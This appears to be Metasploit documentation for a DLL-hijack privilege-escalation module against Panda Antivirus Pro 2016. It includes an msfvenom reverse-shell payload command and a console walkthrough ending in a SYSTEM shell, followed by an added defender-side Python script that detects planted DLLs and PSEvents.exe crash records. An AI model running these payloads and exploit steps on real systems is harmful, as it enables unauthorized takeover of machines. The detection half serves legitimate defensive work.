## Vulnerable Application

Panda Antivirus Pro 2016 16.1.2 is available from filehippo or from an unofficial git.

The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour. A 32-bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure the AV doesn't catch meterpreter in action.

The downloads folder can take 10-15 minutes to appear after install; it is downloaded by Panda AV from the company's servers:

- There's an HTTP GET request to 23.215.132.154 for `/retail/psprofiler/40032/psprofiler_suite.exe`
- Then, right after, an HTTP GET request to 23.215.132.154 for `/retail/psevents_suite.exe`
## Verification Steps

Example steps:

- Install the application
- Wait for the `C:\ProgramData\Panda Security\Panda Devices Agent\Downloads` folder to appear
- Start msfconsole
- Get a shell
- Do: `use exploit/windows/local/panda_psevents`
- Do: `set session [ID]`
- Do: `exploit`
- Go do something else while you wait
- Enjoy being system with your shell
## Options

**DLL**

Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used. However, the DLL seems to be VERY picky. Default is cryptnet.dll. See the chart for more details.

| Target | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
|---|---|---|---|---|---|---|
| 64bit target (1), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
| 64bit target (1), win8.1 x86 | CRASH | CRASH | NO | valid | valid | no |
| 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
| 32bit target (0), win8.1 x86 | CRASH | CRASH | NO | valid | valid (caught by av) | no |
| 32bit target (0), win7sp1 x86 | | | | valid | valid (caught by av) | |

In this chart, `CRASH` means PSEvents.exe crashed on the system, `NO` means PSEvents.exe didn't crash but no session was obtained, and `valid` means we got a shell. Blank cells were not tested.

**ListenerTimeout**

How long to wait for a shell. PSEvents.exe runs every hour or so, so the default is 3610 seconds (3600 plus 10 seconds to account for code execution or other delays).
## Scenarios

### Windows 8.1 x86 with Panda Antivirus Pro 2016 16.1.2
Step 1, get a local shell. I used msfvenom to drop an exe for easy user level meterpreter.
```
msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp -f exe -o meterpreter.exe -e x86/shikata_ga_nai -i 1 LHOST=192.168.2.117 LPORT=4449
```

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter_reverse_tcp
payload => windows/meterpreter_reverse_tcp
msf exploit(handler) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(handler) > set lport 4449
lport => 4449
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.2.117:4449
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.2.117:4449 -> 192.168.2.91:63617) at 2016-09-25 20:32:15 -0400

meterpreter > getuid
Server username: IE11Win8_1\IEUser
meterpreter > background
[*] Backgrounding session 1...
```
Step 2, drop our Panda exploit.

```
msf exploit(handler) > use exploit/windows/local/panda_psevents
msf exploit(panda_psevents) > set session 1
session => 1
msf exploit(panda_psevents) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(panda_psevents) > set exitfunc seh
exitfunc => seh
msf exploit(panda_psevents) > set DLL CRYPTBASE.dll
DLL => CRYPTBASE.dll
msf exploit(panda_psevents) > show options

Module options (exploit/windows/local/panda_psevents):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DLL              CRYPTBASE.dll    yes       dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)
   ListenerTimeout  3610             yes       Number of seconds to wait for the exploit
   SESSION          1                yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.2.117    yes       The listen address
   LPORT     4450             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf exploit(panda_psevents) > exploit

[*] Started reverse TCP handler on 192.168.2.117:4450
[*] Uploading the Payload DLL to the filesystem...
[*] Starting the payload handler, waiting for PSEvents.exe to process folder (up to an hour)...
[*] Start Time: 2016-09-27 18:10:21 -0400
[*] Sending stage (957999 bytes) to 192.168.2.91
[*] Meterpreter session 2 opened (192.168.2.117:4450 -> 192.168.2.91:50022) at 2016-09-27 18:46:15 -0400
[+] Deleted C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\CRYPTBASE.dll

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : IE11WIN8_1
OS              : Windows 8.1 (Build 9600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > background
```
## Failed Exploitation Attempts

If the DLL doesn't work, PSEvents.exe will fail to run. While silent to the user, an error will be recorded in the Windows Application event log:

- Event ID: 1000
- Task Category: (100)
- Log Name: Application
- Source: Application Error
- Details:

```
Faulting application name: PSEvents.exe, version: 4.0.0.35, time stamp: 0x57061ba6
Faulting module name: ntdll.dll, version: 6.3.9600.17415, time stamp: 0x54504b06
Exception code: 0xc0000374
Fault offset: 0x000d0cf2
Faulting process id: 0xdd0
Faulting application start time: 0x01d218a30fbf1ac5
Faulting application path: C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\PSEvents.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb
Faulting package full name:
Faulting package-relative application ID:
```
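The two artifacts this page leaves behind on a host, a candidate DLL placed beside PSEvents.exe in the Downloads tree (the DLL chart under Options) and an Application Error record for PSEvents.exe when the loader rejects the DLL (the record above), can both be checked from the defender's side. The script below is an added example, not part of the Metasploit module or of Panda's software: it walks a Downloads-shaped directory for DLLs with the chart's names next to a PSEvents.exe, and parses exported Event ID 1000 text for PSEvents.exe faults originating in that tree. The `PANDA_DOWNLOADS` path, the DLL names and the first sample record are taken from the page; the second (notepad.exe) record, the temporary directory layout and the helper names (`find_planted_dlls`, `parse_event_details`, `is_psevents_crash`, `triage`, `demo`) are constructed for the example.

```python
"""Defender-side triage for the PSEvents.exe DLL-loading behaviour described on this page.

Added example, not part of the Metasploit module or Panda's software. It does two things:
  1. walks the Panda Devices Agent Downloads tree and reports any DLL with one of the
     chart's candidate names sitting next to a PSEvents.exe (the module uploads its payload
     DLL there and deletes it only after a session opens, so a lingering copy is suspicious);
  2. parses Application-log Event ID 1000 text and flags PSEvents.exe faults from that tree,
     the failure signature the page shows for a DLL the loader rejected.
Field names and the first sample record come from the page; the notepad.exe record is constructed.
"""
import re
import tempfile
from pathlib import Path

# Folder the page names as the download location for PSEvents.exe (Windows path, from the page).
PANDA_DOWNLOADS = Path(r"C:\ProgramData\Panda Security\Panda Devices Agent\Downloads")

# DLL names from the page's compatibility chart, compared case-insensitively.
HIJACK_DLL_NAMES = {
    "winhttp.dll", "version.dll", "bcryptprimitives.dll",
    "cryptbase.dll", "cryptnet.dll", "wininet.dll",
}

# "Key: value" lines as written by the Application Error event source.
EVENT_FIELD = re.compile(r"^(?P<key>[^:]+):\s*(?P<val>.*)$")
# Records in our constructed export are separated by a blank line.
EVENT_SEPARATOR = re.compile(r"\n\s*\n")


def find_planted_dlls(downloads_root):
    """Return every file with a chart DLL name that sits beside a PSEvents.exe under downloads_root."""
    hits = []
    for exe in Path(downloads_root).rglob("PSEvents.exe"):
        for sibling in exe.parent.iterdir():
            if sibling.is_file() and sibling.name.lower() in HIJACK_DLL_NAMES:
                hits.append(sibling)
    return sorted(hits)


def parse_event_details(text):
    """Parse the Details block of one Event ID 1000 record into a dict keyed by field name.
    Only the first colon splits key from value, so 'name, version: ..., time stamp: ...' stays intact."""
    fields = {}
    for line in text.splitlines():
        m = EVENT_FIELD.match(line.strip())
        if m:
            fields[m.group("key").strip()] = m.group("val").strip()
    return fields


def is_psevents_crash(fields):
    """True when the faulting application is PSEvents.exe running out of the Panda Downloads tree.
    Exception code 0xc0000374 in the page's record is STATUS_HEAP_CORRUPTION."""
    app = fields.get("Faulting application name", "").lower()
    path = fields.get("Faulting application path", "").lower()
    return app.startswith("psevents.exe") and "panda devices agent\\downloads" in path


def triage(event_export, downloads_root):
    """Run both checks; returns (matching crash records, planted DLL paths)."""
    records = [parse_event_details(r) for r in EVENT_SEPARATOR.split(event_export.strip())]
    crashes = [f for f in records if is_psevents_crash(f)]
    return crashes, find_planted_dlls(downloads_root)


# First record: the page's own failure record. Second record: constructed benign crash.
SAMPLE_EVENTS = r"""
Faulting application name: PSEvents.exe, version: 4.0.0.35, time stamp: 0x57061ba6
Faulting module name: ntdll.dll, version: 6.3.9600.17415, time stamp: 0x54504b06
Exception code: 0xc0000374
Fault offset: 0x000d0cf2
Faulting process id: 0xdd0
Faulting application start time: 0x01d218a30fbf1ac5
Faulting application path: C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\PSEvents.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb

Faulting application name: notepad.exe, version: 6.3.9600.17415, time stamp: 0x54504b06
Faulting module name: ntdll.dll, version: 6.3.9600.17415, time stamp: 0x54504b06
Exception code: 0xc0000005
Faulting application path: C:\Windows\System32\notepad.exe
"""


def demo():
    """Build a throwaway tree shaped like the Downloads folder and run both checks.
    Constructed data: a hash-named subfolder holding PSEvents.exe, a CRYPTBASE.dll and a log file."""
    with tempfile.TemporaryDirectory() as tmp:
        component = Path(tmp) / "1a2d7253f106c617b45f675e9be08171"
        component.mkdir()
        (component / "PSEvents.exe").write_bytes(b"MZ placeholder")
        (component / "CRYPTBASE.dll").write_bytes(b"MZ placeholder")
        (component / "psevents.log").write_text("benign file")
        crashes, planted = triage(SAMPLE_EVENTS, tmp)
        return [c["Exception code"] for c in crashes], [p.name for p in planted]


if __name__ == "__main__":
    codes, names = demo()
    print("PSEvents.exe crash exception codes:", codes)
    print("candidate DLLs beside PSEvents.exe:", names)
```

On a real host you would point `triage` at `PANDA_DOWNLOADS` and at the text of the Application log exported with `wevtutil` or `Get-WinEvent`; a PSEvents.exe fault with `0xc0000374` combined with a chart DLL left in the component folder is the pattern the page's failed attempts produce.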